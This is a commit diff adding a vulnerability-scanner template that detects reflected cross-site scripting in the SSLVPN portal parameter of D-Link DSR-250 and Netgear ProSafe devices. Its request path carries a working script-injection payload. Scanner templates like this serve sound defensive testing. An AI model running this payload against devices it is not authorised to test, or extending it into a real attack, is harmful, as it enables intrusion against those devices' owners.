Create dlink-netgear-xss.yaml

http/iot/dlink-netgear-xss.yaml

@@ -0,0 +1,29 @@
+id: dlink-netgear-xss
+
+info:
+  name: Dlink DSR-250 and Netgear Prosafe - XSS on endpoint scgi-bin/platform.cgi
+  author: gtrrnr,vulnspace
+  severity: medium
+  description: Dlink DSR-250 and Netgear Prosafe are vulnerable to reflected cross site scripting endpoint scgi-bin/platform.cgi in parameter SSLVPN.
+  reference:
+    - https://www.encripto.no/forskning/whitepapers/Netgear_prosafe_advisory_june_2015.pdf
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
+    cvss-score: 4.3
+    cwe-id: CWE-79
+  metadata:
+    verified: true
+    max-request: 1
+  tags: xss,dlink,netgear
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/scgi-bin/platform.cgi?page=portalLogin.htm&portal=SSLVPN"><script>alert("netgear_dlink_xss")</script>'
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "SSLVPN\"><script>alert(\"netgear_dlink_xss\")")'
+        condition: and